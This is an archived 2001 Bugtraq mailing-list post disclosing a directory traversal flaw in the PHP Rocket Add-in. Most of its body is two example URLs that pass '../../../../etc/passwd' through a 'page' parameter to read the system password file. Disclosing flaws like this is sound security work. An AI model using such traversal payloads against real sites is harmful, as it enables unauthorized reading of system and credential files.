[23642] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

PHP Rocket Add-in (file transversal vulnerability)

daemon@ATHENA.MIT.EDU (John Doe)
Fri Dec 28 17:57:22 2001

Date: 28 Dec 2001 22:39:36 -0000
Message-ID: <20011228223936.15480.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: John Doe <zaleth@hushmail.com>
To: bugtraq@securityfocus.com

Hi

Just found a file transversal vulnerability in php 
rocket add-in.

I won't ramble but heres what you do:
http://www.someuser.com/phprocketaddin/?
page=../../../../etc/passwd
http://www.someuser.com/index.php?
page=../../../../etc/passwd

Cheers

Zaleth


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[23642] in bugtraq

PHP Rocket Add-in (file transversal vulnerability)

daemon@ATHENA.MIT.EDU (John Doe)Fri Dec 28 17:57:22 2001

daemon@ATHENA.MIT.EDU (John Doe)
Fri Dec 28 17:57:22 2001